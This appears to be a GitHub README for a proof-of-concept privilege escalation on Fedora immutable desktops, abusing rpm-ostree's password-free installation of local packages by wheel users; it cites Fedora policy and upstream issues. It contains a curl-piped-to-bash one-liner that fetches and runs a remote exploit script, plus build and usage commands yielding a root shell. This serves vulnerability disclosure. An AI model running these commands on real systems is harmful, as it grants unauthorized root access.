A privilege escalation proof-of-concept for Fedora immutable desktops, using the fact that rpm-ostree install doesn't ask for the user's password to install local packages.
This is a demonstration that any program running as a member of the wheel group (e.g., a pip or npm package, or curl | bash) is able to execute arbitrary code as root without user interaction.
bash <(curl https://raw.githubusercontent.com/rohanssrao/silverblue-privesc/main/privesc.sh)
To undo: rpm-ostree remove privesc
Fedora's Privilege Escalation Policy says:
The policy requires that any code which allows an unprivileged user account to perform, or cause to be performed, certain actions must require administrative authentication prior to the action being carried out. The actions are:
- Add, remove, or downgrade any system-wide application or shared resource (packaged or otherwise), with the exception that for installing Fedora-signed packages from administrator-configured repositories, the requirement to ask for a password is waived for members of the wheel group who are local and active.
privesc.rpm is not Fedora-signed or from an administrator-configured repository, so this behavior can be considered a violation of the policy.
The relevant Polkit rule is here.
Discussions: coreos/rpm-ostree#745, coreos/rpm-ostree#825
Requirements:
dnf install rpmdevtools gcc glibc-staticBuilding:
rpmbuild --bb --define "_rpmdir $(pwd)" --define "_rpmfilename privesc.rpm" privesc.specThis generates privesc.rpm in the current directory. Installing the package creates /usr/bin/privesc which simply runs bash as root.
Usage:
# Layer package
rpm-ostree install privesc.rpm
# Enter root shell. privesc is placed in the newest deployment
"$(ls -td /ostree/deploy/fedora/deploy/*/ | head -1)"/usr/bin/privesc